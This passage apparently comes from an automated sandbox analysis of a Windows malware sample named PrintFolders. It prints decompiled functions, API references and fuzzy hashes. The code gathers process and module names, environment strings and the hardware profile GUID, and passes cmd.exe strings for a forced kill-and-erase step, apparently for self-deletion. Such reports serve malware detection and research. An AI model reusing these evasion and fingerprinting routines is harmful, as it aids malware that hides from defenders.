Part of subcall function 00405420: FindCloseChangeNotification.KERNEL32(00000000,?,00450D41,00000000), ref: 0040546D

GetCurrentProcessId.KERNEL32 ref: 00405508

Part of subcall function 00405250: OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 004052B0
Part of subcall function 00405250: K32EnumProcessModules.KERNEL32(00000000,?,00000004,?,?,?,?,?), ref: 004052CD
Part of subcall function 00405250: K32GetModuleBaseNameA.KERNEL32(00000000,?,?,00000104,?,?,?,?), ref: 004052EA
Part of subcall function 00405250: FindCloseChangeNotification.KERNEL32(00000000,?,?,?,?), ref: 004052F1

ShellExecuteA.SHELL32(00000000,00000000,C:\Windows\System32\cmd.exe,00000000,00000000,00000000), ref: 004055A4

Strings

" & exit, xrefs: 0040554A
" /f & erase ", xrefs: 00405528
C:\Windows\System32\cmd.exe, xrefs: 0040559B

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: Process$ChangeCloseCurrentFindModuleNameNotificationOpen$BaseEnumExecuteFileModulesShell
String ID: " & exit$" /f & erase "$C:\Windows\System32\cmd.exe
API String ID: 3061982424-3347335610
Opcode ID: 6bc7b3ffeecbd7e61c6a60580daaf1c04a1e8b1486a71f75cba929ab9ffd069e
Instruction ID: bb57c133ade53ec488d370c8a58f02c66d8e32e9da8c978da3b10ee8368ab8b3
Opcode Fuzzy Hash: 6bc7b3ffeecbd7e61c6a60580daaf1c04a1e8b1486a71f75cba929ab9ffd069e
Instruction Fuzzy Hash: 35219030A00248DBC704FB75CC46BDDBBB4AB14708F50417AA506B71D2EFB82A49CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00405250 Relevance: 6.1, APIs: 4, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00405250(void* __ebx, int* __ecx, long __edx) {
				signed int _v8;
				char _v258;
				short _v260;
				char _v268;
				char _v272;
				char _v276;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t16;
				short _t18;
				intOrPtr _t23;
				char* _t29;
				void* _t31;
				intOrPtr* _t33;
				void* _t39;
				int* _t40;
				long _t41;
				void* _t42;
				signed int _t43;

				_t31 = __ebx;
				_t16 =  *0x43d054; // 0x7bd02ead
				_v8 = _t16 ^ _t43;
				_t40 = __ecx;
				_t41 = __edx;
				_v276 = __ecx;
				_v276 = __ecx;
				_t18 =  *0x439a7c; // 0x3e
				asm("movq xmm0, [0x439a74]");
				_v260 = _t18;
				asm("movq [ebp-0x108], xmm0");
				E00410B00(__ecx,  &_v258, 0, 0xfa);
				_t42 = OpenProcess(0x410, 0, _t41);
				if(_t42 != 0) {
					_t29 =  &_v276;
					__imp__K32EnumProcessModules(_t42, _t29, 4,  &_v272); // executed
					if(_t29 != 0) {
						__imp__K32GetModuleBaseNameA(_t42, _v276,  &_v268, 0x104); // executed
					}
				}
				FindCloseChangeNotification(_t42); // executed
				_t33 =  &_v268;
				 *_t40 = 0;
				_t40[4] = 0;
				_t39 = _t33 + 1;
				_t40[5] = 0xf;
				 *_t40 = 0;
				do {
					_t23 =  *_t33;
					_t33 = _t33 + 1;
				} while (_t23 != 0);
				E004026B0(_t31, _t40,  &_v268, _t33 - _t39);
				return E0040EBBF(_t40, _t31, _v8 ^ _t43, _t39, _t40, _t42);
			}

0x00405250
0x00405259
0x00405260
0x00405265
0x00405267
0x00405269
0x0040526f
0x00405275
0x0040527b
0x00405288
0x00405298
0x004052a0
0x004052b6
0x004052ba
0x004052c5
0x004052cd
0x004052d5
0x004052ea
0x004052ea
0x004052d5
0x004052f1
0x004052f7
0x004052fd
0x00405303
0x0040530a
0x0040530d
0x00405314
0x00405317
0x00405317
0x00405319
0x0040531a
0x0040532a
0x00405340

APIs

OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 004052B0
K32EnumProcessModules.KERNEL32(00000000,?,00000004,?,?,?,?,?), ref: 004052CD
K32GetModuleBaseNameA.KERNEL32(00000000,?,?,00000104,?,?,?,?), ref: 004052EA
FindCloseChangeNotification.KERNEL32(00000000,?,?,?,?), ref: 004052F1

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: Process$BaseChangeCloseEnumFindModuleModulesNameNotificationOpen
String ID:
API String ID: 1316604328-0
Opcode ID: c0d1d87ece03490290b5015221e901385bd44465a3c604b87790a323a267429d
Instruction ID: 317e0fa30e6df0fc2493c0f556c76fdcfe70c6514a20a7537da84c3b601fc5e8
Opcode Fuzzy Hash: c0d1d87ece03490290b5015221e901385bd44465a3c604b87790a323a267429d
Instruction Fuzzy Hash: 7121C471A005199BD725DF65DC05BEAB7B8EF09300F0002FAEA49A7280DBF45AC5CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00421028 Relevance: 4.7, APIs: 3, Instructions: 170
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 93%

			E00421028(signed int _a4, void* _a8, signed int _a12) {
				long _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				long _v40;
				char _v44;
				signed int _t59;
				signed int _t64;
				signed int _t66;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t81;
				signed int _t84;
				signed int _t91;
				signed int _t93;
				intOrPtr _t95;
				signed int _t100;
				intOrPtr _t101;
				void* _t102;
				signed int _t105;
				signed int _t107;
				void* _t109;

				_t93 = _a12;
				_v8 = _t93;
				_t105 = _a4;
				_t102 = _a8;
				_v16 = _t102;
				if(_t93 == 0) {
					L37:
					__eflags = 0;
					return 0;
				}
				_t113 = _t102;
				if(_t102 != 0) {
					_t100 = _t105 >> 6;
					_t59 = (_t105 & 0x0000003f) * 0x38;
					_v20 = _t100;
					_t101 =  *((intOrPtr*)(0x4508e0 + _t100 * 4));
					_v12 = _t59;
					_t91 =  *((intOrPtr*)(_t101 + _t59 + 0x29));
					__eflags = _t91 - 2;
					if(_t91 == 2) {
						L6:
						__eflags =  !_t93 & 0x00000001;
						if(__eflags == 0) {
							goto L2;
						}
						_t59 = _v12;
						L8:
						__eflags =  *(_t101 + _t59 + 0x28) & 0x00000020;
						if(__eflags != 0) {
							E0041D158(_t105, 0, 0, 2);
							_t109 = _t109 + 0x10;
						}
						_t66 = E00420BCF(_t101, __eflags, _t105);
						__eflags = _t66;
						if(_t66 == 0) {
							_t95 =  *((intOrPtr*)(0x4508e0 + _v20 * 4));
							_t68 = _v12;
							__eflags =  *((char*)(_t95 + _t68 + 0x28));
							if( *((char*)(_t95 + _t68 + 0x28)) >= 0) {
								asm("stosd");
								asm("stosd");
								asm("stosd");
								_t71 = WriteFile( *(_t95 + _t68 + 0x18), _v16, _v8,  &_v40, 0); // executed
								__eflags = _t71;
								if(_t71 == 0) {
									_v44 = GetLastError();
								}
								goto L27;
							}
							_t81 = _t91;
							__eflags = _t81;
							if(_t81 == 0) {
								E00420C40( &_v44, _t105, _t102, _v8);
								goto L16;
							}
							_t84 = _t81 - 1;
							__eflags = _t84;
							if(_t84 == 0) {
								_t83 = E00420E04( &_v44, _t105, _t102, _v8);
								goto L16;
							}
							__eflags = _t84 != 1;
							if(_t84 != 1) {
								goto L33;
							}
							_t83 = E00420D1B( &_v44, _t105, _t102, _v8);
							goto L16;
						} else {
							__eflags = _t91;
							if(__eflags == 0) {
								_t83 = E004207BB(__eflags,  &_v44, _t105, _t102, _v8);
								L16:
								L14:
								L27:
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t72 = _v28;
								__eflags = _t72;
								if(_t72 != 0) {
									return _t72 - _v24;
								}
								_t74 = _v32;
								__eflags = _t74;
								if(_t74 == 0) {
									_t102 = _v16;
									L33:
									__eflags =  *( *((intOrPtr*)(0x4508e0 + _v20 * 4)) + _v12 + 0x28) & 0x00000040;
									if(__eflags == 0) {
										L35:
										 *((intOrPtr*)(E004135F1(__eflags))) = 0x1c;
										_t64 = E004135DE(__eflags);
										 *_t64 =  *_t64 & 0x00000000;
										L3:
										return _t64 | 0xffffffff;
									}
									__eflags =  *_t102 - 0x1a;
									if(__eflags == 0) {
										goto L37;
									}
									goto L35;
								}
								_t107 = 5;
								__eflags = _t74 - _t107;
								if(__eflags != 0) {
									_t64 = E004135BB(_t74);
								} else {
									 *((intOrPtr*)(E004135F1(__eflags))) = 9;
									_t64 = E004135DE(__eflags);
									 *_t64 = _t107;
								}
								goto L3;
							}
							__eflags = _t91 - 1 - 1;
							if(_t91 - 1 > 1) {
								goto L33;
							}
							E00420B67( &_v44, _t102, _v8);
							goto L14;
						}
					}
					__eflags = _t91 - 1;
					if(_t91 != 1) {
						goto L8;
					}
					goto L6;
				}
				L2:
				 *(E004135DE(_t113)) =  *_t62 & 0x00000000;
				 *((intOrPtr*)(E004135F1( *_t62))) = 0x16;
				_t64 = E00413517();
				goto L3;
			}

0x00421030
0x00421033
0x00421038
0x0042103c
0x0042103f
0x00421044
0x004211fb
0x004211fb
0x00000000
0x004211fb
0x0042104a
0x0042104c
0x00421072
0x00421078
0x0042107b
0x0042107e
0x00421085
0x00421088
0x0042108c
0x0042108f
0x00421096
0x0042109a
0x0042109c
0x00000000
0x00000000
0x0042109e
0x004210a1
0x004210a1
0x004210a6
0x004210af
0x004210b4
0x004210b4
0x004210b8
0x004210be
0x004210c0
0x004210fe
0x00421105
0x00421108
0x0042110d
0x0042115e
0x00421161
0x00421162
0x0042116e
0x00421174
0x00421176
0x0042117e
0x0042117e
0x00000000
0x00421181
0x00421112
0x00421112
0x00421115
0x0042114e
0x00000000
0x0042114e
0x00421117
0x00421117
0x0042111a
0x0042113e
0x00000000
0x0042113e
0x0042111c
0x0042111f
0x00000000
0x00000000
0x0042112e
0x00000000
0x004210c2
0x004210c2
0x004210c4
0x004210f1
0x004210f6
0x004210e1
0x00421184
0x00421187
0x00421188
0x00421189
0x0042118a
0x0042118d
0x0042118f
0x00000000
0x004211f6
0x00421191
0x00421194
0x00421196
0x004211c2
0x004211c5
0x004211d2
0x004211d7
0x004211de
0x004211e3
0x004211e9
0x004211ee
0x00421066
0x00000000
0x00421066
0x004211d9
0x004211dc
0x00000000
0x00000000
0x00000000
0x004211dc
0x0042119a
0x0042119b
0x0042119d
0x004211b7
0x0042119f
0x004211a4
0x004211aa
0x004211af
0x004211af
0x00000000
0x0042119d
0x004210c8
0x004210cb
0x00000000
0x00000000
0x004210d9
0x00000000
0x004210de
0x004210c0
0x00421091
0x00421094
0x00000000
0x00000000
0x00000000
0x00421094
0x0042104e
0x00421053
0x0042105b
0x00421061
0x00000000

APIs

Part of subcall function 004207BB: GetConsoleOutputCP.KERNEL32(00000000,00000000,?), ref: 00420803

WriteFile.KERNEL32(?,00000000,00000000,?,00000000,0000000C,00000000,00000000,?,?,?,00000000,?,?,?,00000000), ref: 0042116E
GetLastError.KERNEL32(?,?,?,00000000,?,?,?,00000000), ref: 00421178
__dosmaperr.LIBCMT ref: 004211B7

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: ConsoleErrorFileLastOutputWrite__dosmaperr
String ID:
API String ID: 910155933-0
Opcode ID: e24a92b2f476dda8a345309e2f2059689fa752e10403ff131c579cb01226544e
Instruction ID: 3c7e185e40fd80dbdae143d1bdd6e74d6c83d27f732932d537b6873211927bf6
Opcode Fuzzy Hash: e24a92b2f476dda8a345309e2f2059689fa752e10403ff131c579cb01226544e
Instruction Fuzzy Hash: 4F513671F00269ABDB209FA9D805FEF7BB5AF59314F54004BE500A7262C77CDA82C769

Uniqueness

Uniqueness Score: -1.00%

Function 00424B90 Relevance: 4.6, APIs: 3, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00424B90(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _t7;
				void* _t8;
				void* _t13;
				void* _t24;
				WCHAR* _t26;

				_t26 = GetEnvironmentStringsW();
				if(_t26 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t17 = E00424B59(_t26) - _t26 >> 1;
					_t7 = E00420094(0, 0, _t26, E00424B59(_t26) - _t26 >> 1, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t8 = E0041ED2F(_t7); // executed
						_t24 = _t8;
						if(_t24 == 0 || E00420094(0, 0, _t26, _t17, _t24, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t24;
							_t24 = 0;
						}
						E0041E2B8(_t24);
					}
				}
				if(_t26 != 0) {
					FreeEnvironmentStringsW(_t26);
				}
				return _t13;
			}

0x00424b9f
0x00424ba5
0x00424c00
0x00424c00
0x00424ba7
0x00424bb5
0x00424bbb
0x00424bc3
0x00424bc8
0x00000000
0x00424bca
0x00424bcb
0x00424bd0
0x00424bd5
0x00424bf5
0x00424bef
0x00424bef
0x00424bf1
0x00424bf1
0x00424bf8
0x00424bfd
0x00424bc8
0x00424c04
0x00424c07
0x00424c07
0x00424c13

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00424B99
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00424C07

Part of subcall function 00420094: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,004213AE,?,00000000,00000000), ref: 00420140

Part of subcall function 0041ED2F: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040FF9B,?,?,?,?,?,00403757,?,?,?), ref: 0041ED61

_free.LIBCMT ref: 00424BF8

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
String ID:
API String ID: 2560199156-0
Opcode ID: a99ed16166c4cb6fd5d58302230d1ee3cac86f8bd5c28f31c17afe00db9e4936
Instruction ID: 8e17b8cbccb8b4fc6403cf286aecc81c96b356ed4abcbad2db771e8ab638680e
Opcode Fuzzy Hash: a99ed16166c4cb6fd5d58302230d1ee3cac86f8bd5c28f31c17afe00db9e4936
Instruction Fuzzy Hash: 1101FC727012357B2331167B3C89E7F6D5DCDC2B94396012AFE04D6201EDA8DC0281BC

Uniqueness

Uniqueness Score: -1.00%

Function 00405420 Relevance: 4.6, APIs: 3, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00405420(int* __ecx, long __edx) {
				signed int _v8;
				char _v268;
				int* _v272;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				intOrPtr _t14;
				void* _t21;
				intOrPtr* _t23;
				void* _t29;
				void* _t30;
				int* _t31;
				signed int _t32;

				_t11 =  *0x43d054; // 0x7bd02ead
				_v8 = _t11 ^ _t32;
				_t31 = __ecx;
				_v272 = __ecx;
				_v272 = __ecx;
				_t30 = OpenProcess(0x410, 0, __edx);
				if(_t30 != 0) {
					__imp__K32GetModuleFileNameExA(_t30, 0,  &_v268, 0x104); // executed
					FindCloseChangeNotification(_t30); // executed
				}
				_t23 =  &_v268;
				 *_t31 = 0;
				_t31[4] = 0;
				_t29 = _t23 + 1;
				_t31[5] = 0xf;
				 *_t31 = 0;
				do {
					_t14 =  *_t23;
					_t23 = _t23 + 1;
				} while (_t14 != 0);
				E004026B0(_t21, _t31,  &_v268, _t23 - _t29);
				return E0040EBBF(_t31, _t21, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x00405429
0x00405430
0x00405436
0x0040543a
0x00405445
0x00405451
0x00405455
0x00405466
0x0040546d
0x0040546d
0x00405473
0x00405479
0x0040547f
0x00405486
0x00405489
0x00405490
0x00405493
0x00405493
0x00405495
0x00405496
0x004054a6
0x004054bc

APIs

OpenProcess.KERNEL32(00000410,00000000,?,00450D41,00000000), ref: 0040544B
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104,?,00450D41,00000000), ref: 00405466
FindCloseChangeNotification.KERNEL32(00000000,?,00450D41,00000000), ref: 0040546D

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: ChangeCloseFileFindModuleNameNotificationOpenProcess
String ID:
API String ID: 4186666201-0
Opcode ID: 1393ca63317ed933dd5bffd107fb2ff396153b6cb66a741b0b6755bcac672aa0
Instruction ID: 922376feaebcf12d809977a557db1708a013f2b36cdaadcafb515ec78757bc9b
Opcode Fuzzy Hash: 1393ca63317ed933dd5bffd107fb2ff396153b6cb66a741b0b6755bcac672aa0
Instruction Fuzzy Hash: 741104306002189BD720DF25DC05BFBBBB4DB45700F0002AEE58597280DBF95A868FD8

Uniqueness

Uniqueness Score: -1.00%

Function 004066A0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67
processCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E004066A0(void* __ebx, CHAR* __ecx, void* __edi, struct _SECURITY_ATTRIBUTES** _a4, intOrPtr _a24) {
				signed int _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v100;
				signed int _v116;
				char _v132;
				struct tagHW_PROFILE_INFOA _v240;
				struct _SECURITY_ATTRIBUTES** _v244;
				void* __esi;
				void* __ebp;
				signed int _t28;
				struct _SECURITY_ATTRIBUTES** _t35;
				signed int _t40;
				signed int _t43;
				signed int _t44;
				signed int _t49;
				struct _SECURITY_ATTRIBUTES** _t58;
				intOrPtr* _t63;
				intOrPtr _t70;
				void* _t73;
				signed int _t75;
				void* _t77;
				struct _SECURITY_ATTRIBUTES** _t78;
				signed int _t79;
				signed int _t80;
				signed int _t81;

				_t74 = __edi;
				_t54 = __ebx;
				_t28 =  *0x43d054; // 0x7bd02ead
				_v8 = _t28 ^ _t79;
				_v100.cb = 0x44;
				asm("xorps xmm0, xmm0");
				_t31 =  >=  ? _a4 :  &_a4;
				asm("movlpd [ebp-0x5c], xmm0");
				asm("movlpd [ebp-0x54], xmm0");
				asm("movlpd [ebp-0x4c], xmm0");
				asm("movlpd [ebp-0x44], xmm0");
				asm("movlpd [ebp-0x3c], xmm0");
				asm("movlpd [ebp-0x34], xmm0");
				asm("movlpd [ebp-0x2c], xmm0");
				asm("movlpd [ebp-0x24], xmm0");
				asm("movups [ebp-0x14], xmm0"); // executed
				CreateProcessA(__ecx,  >=  ? _a4 :  &_a4, 0, 0, 0, 0, 0, 0,  &_v100,  &_v24); // executed
				_t70 = _a24;
				_t77 =  !=  ? _v24.dwProcessId : _t75 | 0xffffffff;
				if(_t70 < 0x10) {
					L4:
					return E0040EBBF(_t77, _t54, _v8 ^ _t79, _t70, _t74, _t77);
				} else {
					_t58 = _a4;
					_t70 = _t70 + 1;
					_t35 = _t58;
					if(_t70 < 0x1000) {
						L3:
						_push(_t70);
						E0040EDFF(_t58);
						goto L4;
					} else {
						_t58 =  *(_t58 - 4);
						_t70 = _t70 + 0x23;
						if(_t35 - _t58 + 0xfffffffc > 0x1f) {
							E00413527(__ebx, _t70, __eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t79);
							_t80 = _t81;
							_t40 =  *0x43d054; // 0x7bd02ead
							_v116 = _t40 ^ _t80;
							_push(_t77);
							_t78 = _t58;
							_v244 = _t78;
							_v244 = _t78;
							_t43 = GetCurrentHwProfileA( &_v240); // executed
							__eflags = _t43;
							if(__eflags == 0) {
								_t44 = E00417DF6(_t58, __eflags);
								asm("cdq");
								E004055C0(_t78, _t44 % 0xa + 5);
								__eflags = _v24.dwThreadId ^ _t80;
								return E0040EBBF(_t78, __ebx, _v24.dwThreadId ^ _t80, _t44 % 0xa + 5, __edi, _t78);
							} else {
								_t63 =  &_v132;
								 *_t78 = 0;
								_t78[4] = 0;
								_t73 = _t63 + 1;
								_t78[5] = 0xf;
								 *_t78 = 0;
								do {
									_t49 =  *_t63;
									_t63 = _t63 + 1;
									__eflags = _t49;
								} while (_t49 != 0);
								E004026B0(__ebx, _t78,  &_v132, _t63 - _t73);
								__eflags = _v24.dwThreadId ^ _t80;
								return E0040EBBF(_t78, __ebx, _v24.dwThreadId ^ _t80, _t73, __edi, _t78);
							}
						} else {
							goto L3;
						}
					}
				}
			}

0x004066a0
0x004066a0
0x004066a6
0x004066ad
0x004066bc
0x004066cc
0x004066d2
0x004066dc
0x004066e1
0x004066e6
0x004066eb
0x004066f0
0x004066f5
0x004066fa
0x004066ff
0x00406704
0x00406708
0x0040670e
0x00406716
0x0040671d
0x00406747
0x00406757
0x0040671f
0x0040671f
0x00406722
0x00406723
0x0040672b
0x0040673d
0x0040673d
0x0040673f
0x00000000
0x0040672d
0x0040672d
0x00406730
0x0040673b
0x00406758
0x0040675d
0x0040675e
0x0040675f
0x00406760
0x00406761
0x00406769
0x00406770
0x00406773
0x00406774
0x00406779
0x00406780
0x00406786
0x0040678c
0x0040678e
0x004067d6
0x004067db
0x004067e8
0x004067f2
0x004067fd
0x00406790
0x00406790
0x00406793
0x00406799
0x004067a0
0x004067a3
0x004067aa
0x004067b0
0x004067b0
0x004067b2
0x004067b3
0x004067b3
0x004067c0
0x004067cb
0x004067d5
0x004067d5
0x00000000
0x00000000
0x00000000
0x0040673b
0x0040672b

APIs

CreateProcessA.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00406708

Strings

D, xrefs: 004066BC

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: D
API String ID: 963392458-2746444292
Opcode ID: ee5791995512ebe7736d57afe2c1496ebed76edc28558b6e22b2e9b0c1df2158
Instruction ID: 50eb80fa6753c829cd3f054dc80da8a320b46d7d2baa1acb39a29d7f976f20fa
Opcode Fuzzy Hash: ee5791995512ebe7736d57afe2c1496ebed76edc28558b6e22b2e9b0c1df2158
Instruction Fuzzy Hash: 7D21B031E1034CA7DB14DFA5CE457ADB3B2EB89704F209319F9157A184EB74AA808B88

Uniqueness

Uniqueness Score: -1.00%

Function 0041A61D Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0041A61D(void* __ebx, void* __ecx) {
				void* _t2;
				intOrPtr _t3;
				signed int _t13;
				signed int _t14;

				if( *0x450898 == 0) {
					_push(_t13);
					E00424883(__ebx); // executed
					_t2 = E00424B90(__ecx); // executed
					_t17 = _t2;
					if(_t2 != 0) {
						_t3 = E0041A670(__ebx, _t17);
						if(_t3 != 0) {
							 *0x4508a4 = _t3;
							_t14 = 0;
							 *0x450898 = _t3;
						} else {
							_t14 = _t13 | 0xffffffff;
						}
						E0041E2B8(0);
					} else {
						_t14 = _t13 | 0xffffffff;
					}
					E0041E2B8(_t17);
					return _t14;
				} else {
					return 0;
				}
			}

0x0041a624
0x0041a62a
0x0041a62b
0x0041a630
0x0041a635
0x0041a639
0x0041a641
0x0041a649
0x0041a650
0x0041a655
0x0041a657
0x0041a64b
0x0041a64b
0x0041a64b
0x0041a65e
0x0041a63b
0x0041a63b
0x0041a63b
0x0041a665
0x0041a66f
0x0041a626
0x0041a628
0x0041a628

APIs

_free.LIBCMT ref: 0041A665

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 526f0598ed6c5c09f80c27bed797f3bdec909cf5737d209df5188b07db91258f
Instruction ID: 569bb8f4cb614d0ae093e3d0afb7296beb312a053887baa6913238e5c0853e05
Opcode Fuzzy Hash: 526f0598ed6c5c09f80c27bed797f3bdec909cf5737d209df5188b07db91258f
Instruction Fuzzy Hash: F8E06C3650351145A615367B7C017F716898BD1379F69032BF854862D1DA7C88D240AF

Uniqueness

Uniqueness Score: -1.00%

Function 0041AA71 Relevance: 1.6, APIs: 1, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0041AB24

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 59e20a6d73741625aa60e7257ae5aeb68c6bd765af771a165dc67992aa078022
Instruction ID: 80c14f1a6abcca7d923a46e9f34a6542aaf5e04ef8ab335fbec2492ac4023ecb
Opcode Fuzzy Hash: 59e20a6d73741625aa60e7257ae5aeb68c6bd765af771a165dc67992aa078022
Instruction Fuzzy Hash: 22318076A016109F8B14CFADC58099EF7F2FF8932072581A6D615EB360C334AD55CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00406760 Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00406760(void* __ebx, char* __ecx, void* __edi) {
				signed int _v8;
				struct tagHW_PROFILE_INFOA _v132;
				char* _v136;
				void* __esi;
				void* __ebp;
				signed int _t16;
				int _t19;
				signed int _t20;
				intOrPtr _t25;
				intOrPtr* _t36;
				void* _t43;
				char* _t45;
				signed int _t46;

				_t31 = __ecx;
				_t16 =  *0x43d054; // 0x7bd02ead
				_v8 = _t16 ^ _t46;
				_t45 = __ecx;
				_v136 = __ecx;
				_v136 = __ecx;
				_t19 = GetCurrentHwProfileA( &_v132); // executed
				if(_t19 == 0) {
					_t20 = E00417DF6(_t31, __eflags);
					asm("cdq");
					E004055C0(_t45, _t20 % 0xa + 5);
					__eflags = _v8 ^ _t46;
					return E0040EBBF(_t45, __ebx, _v8 ^ _t46, _t20 % 0xa + 5, __edi, _t45);
				} else {
					_t36 =  &(_v132.szHwProfileGuid);
					 *_t45 = 0;
					 *((intOrPtr*)(_t45 + 0x10)) = 0;
					_t43 = _t36 + 1;
					 *((intOrPtr*)(_t45 + 0x14)) = 0xf;
					 *_t45 = 0;
					do {
						_t25 =  *_t36;
						_t36 = _t36 + 1;
					} while (_t25 != 0);
					E004026B0(__ebx, _t45,  &(_v132.szHwProfileGuid), _t36 - _t43);
					return E0040EBBF(_t45, __ebx, _v8 ^ _t46, _t43, __edi, _t45);
				}
			}

0x00406760
0x00406769
0x00406770
0x00406774
0x00406779
0x00406780
0x00406786
0x0040678e
0x004067d6
0x004067db
0x004067e8
0x004067f2
0x004067fd
0x00406790
0x00406790
0x00406793
0x00406799
0x004067a0
0x004067a3
0x004067aa
0x004067b0
0x004067b0
0x004067b2
0x004067b3
0x004067c0
0x004067d5
0x004067d5

APIs

GetCurrentHwProfileA.ADVAPI32(?), ref: 00406786

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 4866f708c36be3b8c5458998122e6fbc1a421f3c5607ad6291c9d3a1b93d6214
Instruction ID: aa22e25d1b11b59e7382e39be16936437f2c1d5e4af8da413c1625e3f1392632
Opcode Fuzzy Hash: 4866f708c36be3b8c5458998122e6fbc1a421f3c5607ad6291c9d3a1b93d6214
Instruction Fuzzy Hash: BA11A9307002189BDB24EF65D8557BEB7B9EF09308F0005AEE84697781DF795A098BD5

Uniqueness

Uniqueness Score: -1.00%

Function 0041E0B9 Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0041E0B9(void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v8;
				char _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				void* _t26;

				E0041DE8F(__ecx,  &_v32, _a8);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_v12 == 0) {
					L3:
					return 0;
				} else {
